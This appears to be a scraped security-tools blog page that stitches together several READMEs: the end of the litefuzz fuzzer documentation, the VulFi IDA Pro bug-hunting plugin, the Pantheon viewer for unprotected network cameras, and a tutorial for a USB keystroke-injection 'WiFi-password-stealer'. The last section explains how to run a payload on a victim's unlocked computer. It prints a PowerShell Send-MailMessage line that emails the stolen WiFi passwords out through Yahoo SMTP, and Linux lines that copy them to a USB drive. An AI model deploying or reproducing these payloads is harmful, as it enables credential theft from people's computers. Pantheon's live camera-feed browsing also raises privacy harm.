UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.txt
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.zz

ls crashes/serverd/REMOTE_SERVER_localhost_NNNN_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
REMOTE_SERVER_testbox.1_NNNN_1.zz REMOTE_SERVER_localhost_NNNN_2.zz
REMOTE_SERVER_testbox.1_NNNN_3.zz REMOTE_SERVER_localhost_NNNN_4.zz

golang

Apparently when Golang binaries crash, they may not actually go down with a traditional SIGSEGV, even if that's what they say in the panic info (Linux tested). They may instead crash with return code 2. So I guess that's what we're going with :) I'm sure there's a better explanation out there for how this works and edge cases around it, but one can use --golang to try and catch crashes in golang binaries on Linux.

litefuzz -l -c "evernote2md FUZZ" -i input/enex -o crashes/evernote2md --golang -n 100000

repros

Crashing files are kept in the crashes/ directory (or otherwise specified by -o flag) along with diffs and crash info.

-r and passing a repro file (or directory) with the appropriate target command line / address setup will try and reproduce the crash locally or remotely.

local example

litefuzz -l -c "latex2rtf FUZZ" -r crashes/latex2rtf/test.tex -z

local network example

./litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -r crashes/crash.raw

remote network example

litefuzz -s -a tcp://host:8000 -r crashes/crash.raw

remote network example (multiple packets)

litefuzz -s -a tcp://localhost:22 -r repro/dir/here

remove file

Some targets ask for a static outfile location as part of their command line and may throw an error if that file already exists. --rmfile is an option for getting around this while fuzzing: after each fuzzing iteration, it removes the file that was generated as part of how the target functions.

litefuzz -l -c "hdiutil makehybrid -o /tmp/test.iso -joliet -iso FUZZ" -i input/dmg --rmfile /tmp/test.iso -n 500000 -ez

minimization

Minimizing crashing files is an interesting activity. You can even infer how a target is parsing data by comparing a repro with a minimized version.

-m and passing a repro file with the target command line or address setup will attempt to generate a minimized version of the repro which still crashes the target, but smaller and without bytes that may not be necessary. During this minimization journey, it may even find new crashes. Only local modes are supported, but this still includes local client and server modes, so you can minimize network crashes as long as we can debug them locally.

For example, this request is the original repro file.

GET /admin.cgi?pass=changeme&mode=debug&option=donotcrash HTTP/1.1
Host: localhost:8000
Connection: keep-alive
Authorization: Basic YWRtaW46Y2hhbmdlbWU=
Referer: http://localhost:8000/admin.cgi?mode=debug

Now take a look at its minimized version.

GET /admin.cgi?mode=debug&option=a
Authorization:s YWRtaW46Y2hhbmdlbWU
Referer:admin.cgi

One can make some guesses about what the target is looking for and even the root cause of the crash.

  1. The request is the most important part
  2. option= can probably be a lot of different things
  3. The Host and Connection headers aren't necessary
  4. Authorization header parsing is just looking for the second token and doesn't care if it's explicitly presenting Basic auth
  5. Referer is necessary, but only admin.cgi and not the host or URL

Anything else? Here's a bonus: passing a valid password isn't needed if the Authorization creds are correct, and vice versa. Since the minimization is linear and starts at the beginning of the file and goes until it hits the end, we'd only produce a repro which authenticates this way, while still discovering there are actually two options!
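
The linear pass described above is essentially: walk the repro from the start, drop one byte at a time, and keep each deletion that still crashes the target. A rough Python sketch, where crashes() stands in for running the target on a candidate (a hypothetical helper):

def minimize(data, crashes):
    i = 0
    while i < len(data):
        candidate = data[:i] + data[i + 1:]   # try dropping the byte at position i
        if crashes(candidate):
            data = candidate                  # still crashes: keep the smaller repro
        else:
            i += 1                            # byte was needed, move on
    return data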

-mm enables supermin mode. This is slower, but it will try and minimize over and over again until there are no more unnecessary bytes to remove.

For fun, we can modify the repro and run it through supermin to get the maximally minimized version.

GET /admin.cgi?pass=changeme&mode=debug&option=a
Referer:admin.cgi

minimization examples

litefuzz -l -c "latex2rtf FUZZ" -m test.tex -z

litefuzz -ls -c "./sc_serv shoutcast.conf" -a "tcp://localhost:8000" -m repro.http

supermin example

litefuzz -l -c "latex2rtf FUZZ" -mm crashes/latex2rtf/test.tex -z
...
[+] starting minimization

@ 582/582 (1 new crashes, 1145 -> 582 bytes, ~0:00:00 remaining)

[+] reduced crash @ pc=55555556c141 -> pc=55555557c57d to 582 bytes

[+] supermin activated, continuing...

@ 299/299 (1 new crashes, 582 -> 300 bytes, ~0:00:00 remaining)

[+] reduced crash @ pc=55555557c57d to 300 bytes
...
[+] reduced crash @ pc=555555562170 to 17 bytes

@ 17/17 (2 new crashes, 17 -> 17 bytes, ~0:00:00 remaining)

[+] achieved maximum minimization @ 17 bytes (test.min.tex)

[RESULTS]
completed (17) iterations with 2 new crashes found

command

--cmd allows a user to specify a command to run after each iteration. This can be used to cleanup certain operations that would otherwise take up resources on the system.

litefuzz -l -c "/System/Library/CoreServices/DiskImageMounter.app/Contents/MacOS/DiskImageMounter FUZZ" -i input/dmg --cmd "umount /Volumes/test.dir" --click -x 5 -n 100000 -ez

examples

local app

quick look

litefuzz -l -c "latex2rtf FUZZ" -i input/tex -o crashes/latex2rtf -x 1 -n 100
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 3516
cmdline: latex2rtf FUZZ
crash dir: crashes/latex2rtf
input dir: input/tex
inputs: 4
iterations: 100
mutator: random(mutators)

@ 100/100 (1 crashes, 4 duplicates, ~0:00:00 remaining)

[RESULTS]
> completed (100) iterations with (1) unique crashes and 4 dups
>> check crashes/latex2rtf dir for more details

enumerating file handlers on Ubuntu

$ cat /usr/share/applications/defaults.list
[Default Applications]
application/csv=libreoffice-calc.desktop
application/excel=libreoffice-calc.desktop
application/msexcel=libreoffice-calc.desktop
application/msword=libreoffice-writer.desktop
application/ogg=rhythmbox.desktop
application/oxps=org.gnome.Evince.desktop
application/postscript=org.gnome.Evince.desktop
....

fuzz the local tcpdump's pcap parsing (Linux)

litefuzz -l -c "tcpdump -r FUZZ" -i test-pcaps

fuzz Evince document reader (Linux GUI)

litefuzz -l -c "evince FUZZ" -i input/oxps -x 1 -n 10000

fuzz antiword (oldie but good test app :) (Linux)

litefuzz -l -c "antiword FUZZ" -i input/doc -ez

note: you can (and probably should) pass -z to enable Electric Fence (or fallback to glibc's feature) for heap error checking

enumerating file handlers on OS X

swda can enumerate file handlers on Mac.

$ ./swda getUTIs | grep -Ev "No application set"
com.adobe.encapsulated-postscript /System/Applications/Preview.app
com.adobe.flash.video /System/Applications/QuickTime Player.app
com.adobe.pdf /System/Applications/Preview.app
com.adobe.photoshop-image /System/Applications/Preview.app
....

fuzz gpg decryption via stdin with heap error checking (Mac)

litefuzz -l -c "gpg --decrypt" -i test-gpg -o crashes-gpg -z

fuzz Books app (Mac GUI)

litefuzz -l -c "/System/Applications/Books.app/Contents/MacOS/Books FUZZ" -i test-epub -t "/Users/test/Library/Containers/com.apple.iBooksX/Data" -x 8 -n 100000 -z

note: -z here enables Guard Malloc heap error checking in order to detect subtle heap corruption bugs

mac note

Some GUI targets may fail to be killed after each iteration's timeout and become unresponsive. To mitigate this, you can run a script like the one below in another terminal to periodically kill them in batch, reducing manual effort and monitoring; otherwise the fuzzing process may be affected.

#!/bin/bash
ps -Af | grep -ie "$1" | awk '{print $2}' | xargs kill -9
$ while :; do ./pkill.sh "Process Name /Users/test"; sleep 360; done

/Users/test (an example of the first part of the path where temp files are passed to the local GUI app; FUZZ becomes a path during execution) was chosen because you need a unique string to match when killing processes; if you only use the Process Name, it will kill the fuzzing process too, as its command line also contains the Process Name.

enumerating file handlers on Windows

Using the AssocQueryString script with the assoc command can map file extensions to default applications.

C:\> .\AssocQueryString.ps1
...
.hlp :: C:\Windows\winhlp32.exe
.hta :: C:\Windows\SysWOW64\mshta.exe
.htm :: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
.html :: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
.icc :: C:\Windows\system32\colorcpl.exe
.icm :: C:\Windows\system32\colorcpl.exe
.imesx :: C:\Windows\system32\IME\SHARED\imesearch.exe
.img :: C:\Windows\Explorer.exe
.inf :: C:\Windows\system32\NOTEPAD.EXE
.ini :: C:\Windows\system32\NOTEPAD.EXE
.iso :: C:\Windows\Explorer.exe

When fuzzing on Windows, you may want to enable PageHeap and Memory Dumps for a better fuzzing experience (unless your target doesn't like them) prior to starting a new fuzzing run.

sudo litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -z

sudo litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --memdump

Yes, run these commands using (g)sudo on Windows to easily elevate to Admin from the console and make the registry changes needed for the features to be enabled. And this also illustrates another nuance for enabling malloc debuggers for targets: on Linux and Mac, we're using runtime environment flags which need to be passed every time to enable this feature. For Windows, we're modifying the registry so once it's passed the first time, one doesn't need to pass -z or --memdump in the fuzzing command line again (unless to disable or re-enable them).

fuzz PuTTY (puttygen) (Windows)

litefuzz -l -c "C:\Program Files (x86)\WinSCP\PuTTY\puttygen.exe FUZZ" -i input\ppk -x 0.5 -n 100000 -z

fuzz Adobe Reader like back in the day (Windows GUI)

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe FUZZ" -i pdfs -x 3 -n 100000 -z

(WinAppDbg only supports Python 2, so you must use py2 on Windows)

note: reminder that you can enable PageHeap for the target app via -z in an elevated prompt, or by using the sudo alias for the gsudo win32 package that was installed during setup

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe FUZZ" -z

client

quick look

litefuzz -lk -c "ssh -T test@localhost -p 2222" -a tcp://localhost:2222 -i input/ssh-cli -o crashes/ssh -p -n 250000 -z glibc
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 9404
cmdline: ssh -T test@localhost -p 2222
address: tcp://localhost:2222
crash dir: crashes/ssh
input dir: input/ssh-cli
inputs: 4
iterations: 250000
mutator: random(mutators)

@ 73/250000 (0 crashes, 0 duplicates, ~1 day, 0:21:01 remaining)^C

resume? (y/n)> n
Terminated
...

cat /tmp/litefuzz/out
padding error: need 57895 block 8 mod 7
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: message authentication code incorrect

local client

fuzz SNMP client on the localhost (Linux)

litefuzz -lk -c "snmpwalk -v 2c -c public localhost:1616 1.3.6.1.2.1.1.1" -a udp://localhost:1616 -i input/snmp/resp.bin -n 1 -d -x 3

remote client

fuzz a remote FTP client (Linux)

while :; do echo "user test\rpass test\rls\rbye\r" | ftp localhost 2121; sleep 1; done

litefuzz -k -i input/ftp/test -a tcp://localhost:2121 -n 100

note: depending on the target, client fuzzing may require listening on a privileged port (1-1024). In this case, on Linux you can either setcap cap_net_bind_service=+ep on the python interpreter or use sudo when running the fuzzer, on Mac just use sudo and on Windows you can run the fuzzer as Administrator to avoid any Permission Denied errors.

server

quick look

litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -i input/shoutcast -o crashes/shoutcast -n 1000 -z
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 4001
cmdline: ./sc_serv shoutcast.conf
address: tcp://localhost:8000
crash dir: crashes/shoutcast
input dir: input/shoutcast
inputs: 3
iterations: 1000
mutator: random(mutators)

@ 1000/1000 (1 crashes, 7 duplicates, ~0:00:00 remaining)

[RESULTS]
> completed (1000) iterations with (1) unique crashes and 7 dups
>> check crashes/shoutcast for more details

local server

fuzz a local Shoutcast server

litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -i input/shoutcast -o crashes/shoutcast -n 1000 -z

remote server

fuzz a remote SMTP server

litefuzz -s -a tcp://10.0.0.11:25 -i input/smtp-req -pp -n 10000

command line

usage: litefuzz.py [-h] [-l] [-k] [-s] [-c CMDLINE] [-i INPUTS] [-n ITERATIONS] [-x MAXTIME] [--mutator MUTATOR] [-a ADDRESS] [-o CRASHDIR] [-t TEMPDIR] [-f FUZZFILE]
[-m MINFILE] [-mm SUPERMIN] [-r REPROFILE] [-e] [-p] [-pp] [-u] [--nofuzz] [--key KEY] [--click] [--tls] [--golang] [--attach ATTACH] [--cmd CMD]
[--rmfile RMFILE] [--reportcrash REPORTCRASH] [--memdump] [--nomemdump] [-z [MALLOC]] [-zz] [-d]

optional arguments:
-h, --help show this help message and exit
-l, --local target will be executed locally
-k, --client target a network client
-s, --server target a network server
-c CMDLINE, --cmdline CMDLINE
target command line
-i INPUTS, --inputs INPUTS
input directory or file
-n ITERATIONS, --iterations ITERATIONS
number of fuzzing iterations (default: 1)
-x MAXTIME, --maxtime MAXTIME
timeout for the run (default: 1)
--mutator MUTATOR, --mutator MUTATOR
mutator to use (default: 0=random)
-a ADDRESS, --address ADDRESS
server address in the ip:port format
-o CRASHDIR, --crashdir CRASHDIR
specify the directory to output crashes (default: crashes)
-t TEMPDIR, --tempdir TEMPDIR
specify the directory to output runtime fuzzing artifacts (default: OS tmp + run dir)
-f FUZZFILE, --fuzzfile FUZZFILE
specify the path and filename to place the fuzzed file (default: OS tmp + run dir + fuzz_random.ext)
-m MINFILE, --minfile MINFILE
specify a crashing file to generate a minimized version of it (bonus: may also find variant bugs)
-mm SUPERMIN, --supermin SUPERMIN
loops minimize to grind on until no more bytes can be removed
-r REPROFILE, --reprofile REPROFILE
specify a crashing file or directory to replay on the target
-e, --reuse enable second round fuzzing where any crashes found are reused as inputs
-p, --multibin use multiple requests or responses as inputs for fuzzing simple binary network sessions
-pp, --multistr use multiple requests or responses within input for fuzzing simple string-based network sessions
-u, --insulate only execute the target once and inside a debugger (eg. interactive clients)
--nofuzz, --nofuzz send input as-is without mutation (useful for debugging)
--key KEY, --key KEY send a particular key every iteration for interactive targets (eg. F5 for refresh)
--click, --click click the mouse (eg. position the cursor over target button to click beforehand)
--tls, --tls enable TLS for network fuzzing
--golang, --golang enable fuzzing of Golang binaries
--attach ATTACH, --attach ATTACH
attach to a local server process name (mac only)
--cmd CMD, --cmd CMD execute this command after each fuzzing iteration (eg. umount /Volumes/test.dir)
--rmfile RMFILE, --rmfile RMFILE
remove this file after every fuzzing iteration (eg. target won't overwrite output file)
--reportcrash REPORTCRASH, --reportcrash REPORTCRASH
use ReportCrash to help catch crashes for a specified process name (mac only)
--memdump, --memdump enable memory dumps (win32)
--nomemdump, --nomemdump
disable memory dumps (win32)
-z [MALLOC], --malloc [MALLOC]
enable malloc debug helpers (free bugs, but perf cost)
-zz, --nomalloc disable malloc debug helpers (eg. pageheap)
-d, --debug Turn on debug statements

trophies

Litefuzz has fuzzed crashes out of various software packages such as...

  • antiword
  • AppleScript (OS X)
  • ArangoDB VelocyPack
  • Avast authenticode-parser
  • Avast RetDec
  • BBC Audio Waveform
  • ColorSync (OS X)
  • Dynamsoft BarcodeReader
  • eot2ttf
  • evernote2md
  • faad2
  • Facebook's Origami Studio
  • FontForge
  • ForestDB
  • Gifsicle
  • GPUJPEG
  • GPAC Multimedia Framework
  • Google Draco
  • GoPro GPR
  • GtkRadiant
  • IIPImage Server
  • John The Ripper
  • Kyoto Cabinet
  • latex2rtf
  • libMeshb
  • libembroidery
  • libsndfile
  • Lion Vector Graphics (lvg)
  • L-SMASH
  • MindNode
  • minimp4
  • MiniWeb Server
  • MLpack
  • Nvidia Data Center GPU Manager
  • Numbers (OS X)
  • OpenJPEG
  • OpenOrienteering Mapper
  • OSM Express
  • Pages (OS X)
  • PBRT-Parser
  • Pixar USD
  • Remote Apple Events (OS X)
  • Samsung rlottie
  • Samsung ThorVG
  • Shoutcast Server
  • Silo
  • syslog (OS X)
  • Tencent NCNN
  • TinyXML2
  • UEFITool
  • Ulfius Web Framework
  • zlib

FAQ

how did this project come about?

Fuzzing is fun! And it's nice to do projects that take a contrarian view: fuzzers don't always have to follow the modern or popular approaches to get to the end goal of finding bugs. Whether it's staying close to bare metal, chasing code coverage across all paths, or simply optimizing for the fast and flexible, it's all the same fundamental "invalidating assumptions" way of doing things. However it manifests, enjoy it.

is this project actively maintained?

Please do not expect active support or maintenance on the project. Feel free to fork it to add new features or fix bugs, etc. Perhaps even do a PR for smaller things, although please have no expectations for responses or troubleshooting. Development on this repo is not intended to be active.

how do you know the fuzzer is working well and did you measure it against others?

The purpose of Litefuzz is to find bugs across platforms. And it does. So, honestly the ability to measure it against fuzzerX or fuzzerY just didn't make the cut. Certain trade-offs were made and acknowledged at inception, see the #intro for more details.

what would you change if you were to re-write it today?

It works pretty well as it is and has been tested on a ton of different targets and scenarios. That being said, it could benefit from standardizing on a more modular, plugin-based system where switching between targets and platforms didn't require as many additional checks on the operations side of the code. Of course, more formal tests and a deployment system that exercised it across the supported operating systems would create an environment that is easier to work in when making changes to core functions. It grew from a small yet ambitious project into something a little bigger pretty quickly.

how stable is litefuzz?

The command line, GUI, network fuzzing (mostly on Linux and Mac), minimization, etc. have been tested pretty thoroughly and should be pretty solid overall. Some of the more exotic features, such as insulated network GUI fuzzing, ReportCrash support for Mac and some other niche features, should be considered experimental.

are there unsupported scenarios for litefuzz?

A few of them, yes. Most are either uncommon scenarios that are buggy, required more time and research to "get right", or just don't quite work for platform-related reasons. Many of them explicitly exit with an "unsupported" message when you try to run with such options, and some caveats have been mentioned in the sections above when describing various features. Some of the more nuanced ones: repro mode on insulated apps isn't supported; there's been limited testing of Mac apps using the insulate feature; Pyautogui seems to work fine on Linux and Windows but didn't prove very reliable on Mac, so consider it functionally unsupported there; and client fuzzing on Windows can be a little less reliable than other modes on other platforms.

There may be some edge cases here and there, but the most common local and network fuzzing scenarios have been tested and are working. Ah, the joys of writing cross-platform tooling: rewarding, but it's hard to make everything work great all the time. Overall, fuzzing on Linux/Mac seems to be more stable and supports more features, especially as network fuzzing has had much more testing there than on Windows, but an effort was made for at least the basics to be available on Win32, with a couple of extras.

Feel free to fork this fuzzer and make such improvements, support the currently unsupported, etc., or open PRs for more minor but useful stuff.

what guarantees are given for this project or its code?

Absolutely none. But it's pretty fun to fuzz and watch it hand you bugs.

author / references



VulFi - Plugin To IDA Pro Which Can Be Used To Assist During Bug Hunting In Binaries

By: Zion3R
26 April 2022 at 21:30


The VulFi (Vulnerability Finder) tool is a plugin to IDA Pro which can be used to assist during bug hunting in binaries. Its main objective is to provide a single view with all cross-references to the most interesting functions (such as strcpy, sprintf, system, etc.). For cases where the Hex-Rays decompiler can be used, it will attempt to rule out calls to these functions which are not interesting from a vulnerability research perspective (think something like strcpy(dst,"Hello World!")). Without the decompiler, the rules are much simpler (to not depend on architecture) and thus only rule out the most obvious cases.


Installation

Place the vulfi.py, vulfi_prototypes.json and vulfi_rules.json files in the IDA plugin folder (cp vulfi* <IDA_PLUGIN_FOLDER>).

Preparing the Database File

Before you run VulFi, make sure that you have a good understanding of the binary that you work with. Try to identify all standard functions (strcpy, memcpy, etc.) and name them accordingly. The plugin is case-insensitive, and thus MEMCPY, Memcpy and memcpy are all valid names. However, note that the search for the function requires an exact match. This means that memcpy? or std_memcpy (or any other variant) will not be detected as a standard function and therefore will not be considered when looking for potential vulnerabilities. If you are working with an unknown binary, you need to set the compiler options first (Options > Compiler). After that, VulFi will do its best to filter all obvious false positives (such as a call to printf with a constant string as the first parameter). Please note that while the plugin is made without any ties to a specific architecture, some processors do not have full support for specifying types, and in such cases VulFi will simply mark all cross-references to potentially dangerous standard functions to allow you to proceed with manual analysis. In these cases, you can benefit from the tracking features of the plugin.

Usage

Scanning

To initiate the scan, select Search > VulFi option from the top bar menu. This will either initiate a new scan, or it will read previous results stored inside the idb/i64 file. The data are automatically saved whenever you save the database.

Once the scan is completed or the previous results are loaded, a table will be presented with a view containing the following columns:

  • IssueName - Used as a title for the suspected issue.
  • FunctionName - Name of the function.
  • FoundIn - The function that contains the potentially interesting reference.
  • Address - The address of the detected call.
  • Status - The review status, initial Not Checked is assigned to every new item. The other statuses are False Positive, Suspicious and Vulnerable. Those can be set using a right-click menu on a given item and should reflect the results of the manual review of the given function call.
  • Priority - An attempt to prioritize more interesting calls over the less interesting ones. Possible values are High, Medium and Low. The priorities are defined along with other rules in vulfi_rules.json file.
  • Comment - A user defined comment for the given item.

If there are no data inside the idb/i64 file, or the user decides to perform a new scan, the plugin will ask whether it should run the scan using the default included rules or a custom rules file. Please note that running a new scan over already existing data does not overwrite previously found items identified by a rule with the same name. Therefore, running the scan again does not delete existing comments and status updates.

In the right-click context menu within the VulFi view, you can also remove the item from the results or remove all items. Please note that any comments or status updates will be lost after performing this operation.

Investigation

Whenever you would like to inspect the detected instance of a possibly vulnerable function, just double-click anywhere in the desired row and IDA will take you to the memory location which was identified as potentially interesting. Using right-click and the option Set Vulfi Comment allows you to enter a comment for the given instance (to justify the status, for example).

Adding More Functions

The plugin also allows for creating custom rules. These rules could be defined in the IDA interface (ideal for single functions) or supplied as a custom rule file (ideal for rules that aim to cover multiple functions).

Within the Interface

When you would like to trace a custom function, which was identified during the analysis, just switch the IDA View to that function, right-click anywhere within its body and select Add current function to VulFi.

Custom Set of Rules

It is also possible to load a custom file with a set of multiple rules. To create a custom rule file with the structure below, you can use the included template file here.

[                                  // An array of rules
  {
    "name": "RULE NAME",           // The name of the rule
    "alt_names": [
      "function_name_to_look_for"  // List of all function names that should be matched against the conditions defined in this rule
    ],
    "wrappers": true,              // Look for wrappers of the above functions as well (note that the wrapped function has to also match the rule)
    "mark_if": {
      "High": "True",              // If evaluates to True, mark with priority High (see Rules below)
      "Medium": "False",           // If evaluates to True, mark with priority Medium (see Rules below)
      "Low": "False"               // If evaluates to True, mark with priority Low (see Rules below)
    }
  }
]

An example rule that looks for all cross-references to the function malloc and checks whether its parameter is not constant and whether the return value of the function is checked is shown below:

{
  "name": "Possible Null Pointer Dereference",
  "alt_names": [
    "malloc",
    "_malloc",
    ".malloc"
  ],
  "wrappers": false,
  "mark_if": {
    "High": "not param[0].is_constant() and not function_call.return_value_checked()",
    "Medium": "False",
    "Low": "False"
  }
}

Rules

Available Variables

  • param[<index>]: Used to access the parameter to a function call (index starts at 0)
  • function_call: Used to access the function call event
  • param_count: Holds the count of parameters that were passed to a function

Available Functions

  • Is parameter a constant: param[<index>].is_constant()
  • Get numeric value of parameter: param[<index>].number_value()
  • Get string value of parameter: param[<index>].string_value()
  • Is parameter set to null after the call: param[<index>].set_to_null_after_call()
  • Is return value of a function checked: function_call.return_value_checked(<constant_to_check>)

Examples

  • Mark all calls to a function where third parameter is > 5: param[2].number_value() > 5
  • Mark all calls to a function where the second parameter contains "%s": "%s" in param[1].string_value()
  • Mark all calls to a function where the second parameter is not constant: not param[1].is_constant()
  • Mark all calls to a function where the return value is validated against the value that is equal to the number of parameters: function_call.return_value_checked(param_count)
  • Mark all calls to a function where the return value is validated against any value: function_call.return_value_checked()
  • Mark all calls to a function where none of the parameters starting from the third are constants: all(not p.is_constant() for p in param[2:])
  • Mark all calls to a function where any of the parameters are constant: any(p.is_constant() for p in param)
  • Mark all calls to a function: True
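
For instance, a hypothetical rule (not part of the shipped rule set) could combine the conditions above to flag calls to system whose command argument is not a constant string:

{
  "name": "Possible Command Injection",
  "alt_names": [
    "system",
    "_system"
  ],
  "wrappers": false,
  "mark_if": {
    "High": "not param[0].is_constant()",
    "Medium": "False",
    "Low": "False"
  }
}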

Issues and Warnings

  • When you request a parameter with an index that is out of bounds, any call to the function will be marked as Low priority. This is a way to avoid missing cross-references where it was not possible to correctly get all parameters (this mainly applies to disassembly mode).
  • When you search within the VulFi view, switch context out of the view and come back, the view will not load. You can solve this either by terminating the search operation before switching the context, by moving the VulFi view to the side view so that it is always visible, or by closing and re-opening the view (no data will be lost).
  • Scans for more exotic architectures end with a lot of false positives.


Pantheon - Insecure Camera Parser

By: Zion3R
1 January 2024 at 11:30


Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.

Functionalities

Pantheon allows users to execute an API crawler. There was originally functionality without the use of any APIs (like Insecam), but Google's TOS kept getting in the way of the original scraping mechanism.


Installation

  1. git clone https://github.com/josh0xA/Pantheon.git
  2. cd Pantheon
  3. pip3 install -r requirements.txt
    Execution: python3 pantheon.py
  • Note: I will later add a GUI installer to make it fully independent of a CLI

Windows

  • You can just follow the steps above or download the official package here.
  • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.

Ubuntu

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/ubuntu_install.sh
  • ./distros/ubuntu_install.sh

Debian and Kali Linux

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/debian-kali_install.sh
  • ./distros/debian-kali_install.sh

MacOS

  • The regular installation steps above should suffice. If not, open up an issue.

Usage

(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

(Left-click) on a selected IP:Port to view the geolocation of the camera.
(Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

Adjust the map as you please to see the markers.

  • Also note that this app is far from perfect and not every link that shows up is a live feed; some are login pages (do NOT attempt to log in).

Ethical Notice

The developer of this program, Josh Schiavone, is not responsible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected; that is illegal. Furthermore, if you do choose to use Pantheon to view a live feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html

Licence

MIT License
Copyright (c) Josh Schiavone



WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R
2 January 2024 at 11:30


Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

 

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friendly solution, Rubber Ducky does offer things like stealthiness and usage of the latest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

A keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses the STRING command to process keystrokes for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. ENTER/SPACE will simulate presses of those keyboard keys.

Delays

We use the DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element, such as a command line, to load. Delay is especially useful at the very beginning, when a new USB device is connected to the targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs, setup time is very short; in most cases it takes a fraction of a second, because the drivers are built in. However, in some instances a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.
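
As a short illustration, a hypothetical DuckyScript 1.0 opener (not one of this project's payloads) combines both commands like so:

REM wait for the HID to enumerate before typing anything
DELAY 1000
REM open the Run dialog and start a command prompt
GUI r
DELAY 200
STRING cmd
ENTER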

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, an adversary can package it to avoid detection while sending it over the network, using encryption or compression. The two most common ways of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, the payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions, visit the following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and your email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use an SMTP server from another email provider, but you should be mindful of the SMTP server and port number you write into the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt
